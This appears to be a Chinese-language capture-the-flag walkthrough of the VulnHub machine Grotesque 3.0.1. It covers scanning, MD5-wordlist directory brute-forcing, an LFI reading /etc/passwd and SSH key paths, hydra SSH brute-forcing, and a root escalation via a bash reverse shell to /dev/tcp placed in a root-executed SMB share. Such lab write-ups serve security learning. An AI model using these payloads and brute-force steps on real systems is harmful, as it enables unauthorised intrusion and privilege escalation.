靶机地址:https://www.vulnhub.com/entry/grotesque-301,723/
Description
get flags difficulty: medium
about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions.
This works better with VirtualBox rather than VMware. ## Changelog - v3.0.1 - 20221-08-25 - v3.0.0 - 20221-07-11
攻击机Kali:
IP地址:192.168.9.3
靶机:
IP地址:192.168.9.11
注:靶机与Kali的IP地址只需要在同一局域网即可(同一个网段,即两虚拟机处于同一网络模式)
该靶机环境搭建如下
- 将下载好的靶机环境,导入 VritualBox,设置为 Host-Only 模式
- 将 VMware 中桥接模式网卡设置为 VritualBox 的 Host-only
arp-scan -I eth0 -l
⬢ Grotesque: 3.0.1 arp-scan -I eth0 -l
Interface: eth0, type: EN10MB, MAC: 00:50:56:27:27:36, IPv4: 192.168.9.3
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.9.1 0a:00:27:00:00:12 (Unknown: locally administered)
192.168.9.1 08:00:27:a0:dc:8a PCS Systemtechnik GmbH (DUP: 2)
192.168.9.11 08:00:27:a7:44:6b PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
masscan 192.168.184.0/24 -p 80,22
netdiscover -i eth0 -r 192.168.184.0/24
使用nmap -A -sV -T4 -p- 靶机ip查看靶机开放的端口
⬢ Grotesque: 3.0.1 nmap -A -sV -T4 -p- 192.168.9.11
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-02 20:03 CST
Nmap scan report for bogon (192.168.9.11)
Host is up (0.00040s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)
| 256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)
|_ 256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:A7:44:6B (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|storage-misc|specialized
Running (JUST GUESSING): Linux 4.X|5.X|3.X|2.6.X (98%), Synology DiskStation Manager 5.X (94%), Crestron 2-Series (90%)
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:3 cpe:/a:synology:diskstation_manager:5.2 cpe:/o:linux:linux_kernel:2.6 cpe:/o:crestron:2_series
Aggressive OS guesses: Linux 4.15 - 5.6 (98%), Linux 5.0 - 5.3 (98%), Linux 5.4 (97%), Linux 5.0 - 5.4 (96%), Linux 3.2 - 4.9 (94%), Synology DiskStation Manager 5.2-5644 (94%), Linux 2.6.32 - 3.10 (93%), Linux 2.6.32 - 3.13 (93%), Linux 2.6.32 (92%), Linux 3.10 - 4.11 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms bogon (192.168.9.11)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 100.24 seconds
开放了22,80端口
访问:http://192.168.9.11/
熟悉的人,,,
提示说信息在这个链接里,进去发现是一个图片
放大发现有个小地图有点奇怪,m、d和五个x,是md5吗?
先放一边,扫描一下目录
⬢ Grotesque: 3.0.1 gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.9.11 -x php,html,txt,zip,bak
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.11
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,txt,zip,bak
[+] Timeout: 10s
===============================================================
2022/05/02 20:08:10 Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 590]
/server-status (Status: 403) [Size: 277]
===============================================================
2022/05/02 20:13:43 Finished
===============================================================
⬢ Grotesque: 3.0.1
没啥东西
应该是字典的问题,他提示了md5
咱们就造一个md5的字典吧
for i in $(cat /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt); do echo $i | md5sum >> dir.txt; done
清除减号和空格
扫描一下目录: gobuster dir -w dir.txt -u http://192.168.9.11 -x php,html,txt,zip,bak
⬢ Grotesque: 3.0.1 gobuster dir -w dir.txt -u http://192.168.9.11 -x php,html,txt,zip,bak
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.9.11
[+] Method: GET
[+] Threads: 10
[+] Wordlist: dir.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php,html,txt,zip,bak
[+] Timeout: 10s
===============================================================
2022/05/02 21:32:11 Starting gobuster in directory enumeration mode
===============================================================
/f66b22bf020334b04c7d0d3eb5010391.php (Status: 200) [Size: 0]
===============================================================
2022/05/02 21:37:54 Finished
===============================================================
⬢ Grotesque: 3.0.1
成功拿到新目录/f66b22bf020334b04c7d0d3eb5010391.php
访问:http://192.168.9.11/f66b22bf020334b04c7d0d3eb5010391.php
无回显,且源码也没东西
这个就得模糊测试一下了
wfuzz -c -w /usr/share/wordlists/dirb/big.txt --hw 0 -u http://192.168.9.11/f66b22bf020334b04c7d0d3eb5010391.php\?FUZZ=/etc/passwd
⬢ Grotesque: 3.0.1 wfuzz -c -w /usr/share/wordlists/dirb/big.txt --hw 0 -u http://192.168.9.11/f66b22bf020334b04c7d0d3eb5010391.php\?FUZZ=/etc/passwd
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.9.11/f66b22bf020334b04c7d0d3eb5010391.php?FUZZ=/etc/passwd
Total requests: 20469
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000014755: 200 27 L 40 W 1457 Ch "purpose"
Total time: 0
Processed Requests: 20469
Filtered Requests: 20468
Requests/sec.: 0
成功扫出来purpose
直接curl一下,看看内容
⬢ Grotesque: 3.0.1 curl 'http://192.168.9.11/f66b22bf020334b04c7d0d3eb5010391.php?purpose=/etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
freddie:x:1000:1000:freddie,,,:/home/freddie:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:106:112:MySQL Server,,,:/nonexistent:/bin/false
⬢ Grotesque: 3.0.1
说明是存在LFI的,同时发现一个用户freddie,其权限挺高
查看一下用户的id_rsa:curl 'http://192.168.9.11/f66b22bf020334b04c7d0d3eb5010391.php?purpose=/home/freddie/.ssh/id_rsa'
curl 'http://192.168.9.11/f66b22bf020334b04c7d0d3eb5010391.php?purpose=/home/freddie/.ssh/id_rsa.pub'
都没有回显
估计这个LFI就只是给你一个账户名了
开局就给提提示md5,我想接下来的用户密码也是得用md5字典去爆破
用刚才的md5字典去爆破ssh:hydra -l freddie -P dir.txt ssh://192.168.9.11 -t 20
⬢ Grotesque: 3.0.1 hydra -l freddie -P /home/kali/vulnhub/Grotesque:\ 3.0.1/dir.txt ssh://192.168.9.11
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 207699 login tries (l:1/p:207699), ~12982 tries per task
[DATA] attacking ssh://192.168.9.11:22/
[22][ssh] host: 192.168.9.11 login: freddie password: 61a4e3e60c063d1e472dd780f64e6cad
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
成功爆破出账户密码:61a4e3e60c063d1e472dd780f64e6cad
尝试ssh登录
⬢ Grotesque: 3.0.1 ssh freddie@192.168.9.11
freddie@192.168.9.11's password:
Linux grotesque 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon May 2 08:55:40 2022 from 192.168.9.3
freddie@grotesque:~$
成功登录
查看一下用户目录下都有什么
freddie@grotesque:~$ ls -al
total 20
drwxr-xr-x 4 freddie freddie 4096 May 2 08:55 .
drwxr-xr-x 3 root root 4096 Dec 17 2020 ..
drwx------ 3 freddie freddie 4096 May 2 08:55 .gnupg
drwx------ 2 freddie freddie 4096 Jul 11 2021 .ssh
-r-x------ 1 freddie freddie 32 Jul 11 2021 user.txt
freddie@grotesque:~$ cat user.txt
35A7EB682E33E89606102A883596A880
freddie@grotesque:~$
成功拿到flag1
看一下sudo -l
freddie@grotesque:~$ sudo -l
-bash: sudo: command not found
freddie@grotesque:~$
查找suid程序:find / -perm -u=s -type f 2>/dev/null
freddie@grotesque:~$ find / -perm -u=s -type f 2>/dev/null
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/passwd
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh
freddie@grotesque:~$
去https://gtfobins.github.io找一下,并没有什么新发现
上传linpeas.sh查看一下吧
在靶机上赋予权限,然后运行
突然发现,这边有几个端口是nmap没有扫出来的
其中445端口开着,说明可能开着smb
使用工具遍历共享信息:enum4linux 192.168.9.11
没有结果
咱们直接去靶机上使用smbclient查看共享信息:smbclient -L 127.0.0.1
freddie@grotesque:~$ smbclient -L 127.0.0.1
Unable to initialize messaging context
Enter WORKGROUP\freddie's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
grotesque Disk grotesque
IPC$ IPC IPC Service (Samba 4.9.5-Debian)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP GROTESQUE
得到共享文件夹grotesque
直接进去看看:smbclient //127.0.0.1/grotesque
freddie@grotesque:~$ smbclient //127.0.0.1/grotesque
Unable to initialize messaging context
Enter WORKGROUP\freddie's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 11 09:24:27 2021
.. D 0 Sun Jul 11 09:20:30 2021
1942736 blocks of size 1024. 674116 blocks available
发现并没有什么东西
再上传一个pspy64看一下是否有什么定时任务
发现这个地方root 会去执行 /smbshare 文件夹中的所有内容
去看了一下,smbshare这个文件夹没有权限访问
这就很有操作空间了
咱们可以上传一个反弹shellshell.sh到这个文件夹中,通过定时任务运行这个反弹shell以拿到root权限
具体操作如下,先在kali中写一个shell,这为什么不在靶机上写,主要是因为靶机上没有vim只有vi,而我很不习惯vi的操作
⬢ Grotesque: 3.0.1 vim shell.sh
⬢ Grotesque: 3.0.1 cat shell.sh
#!/bin/bash
sh -i >& /dev/tcp/192.168.9.3/6666 0>&1
将其上传到靶机中
然后进入smb
freddie@grotesque:~$ cd /tmp
freddie@grotesque:/tmp$ ls
linpeas.sh
shell.sh
systemd-private-966b61c4a3bf42889528302ace12acd2-apache2.service-Gybmaq
systemd-private-966b61c4a3bf42889528302ace12acd2-systemd-timesyncd.service-2EzUsP
freddie@grotesque:/tmp$ smbclient //127.0.0.1/grotesque
Unable to initialize messaging context
Enter WORKGROUP\freddie's password:
Try "help" to get a list of possible commands.
smb: \> put shell.sh
putting file shell.sh as \shell.sh (0.8 kb/s) (average 0.8 kb/s)
smb: \> ls
然后kali中监听nc -lvp 6666
⬢ Grotesque: 3.0.1 nc -lvp 6666
listening on [any] 6666 ...
Warning: forward host lookup failed for bogon: Unknown host
connect to [192.168.9.3] from bogon [192.168.9.11] 40334
sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
root.txt
# cat root.txt
5C42D6BB0EE9CE4CB7E7349652C45C4A#
成功拿到root权限,并在root目录下拿到flag2
本靶机涉及到的漏洞就LFI一个,主要还是信息收集,还有一点脑洞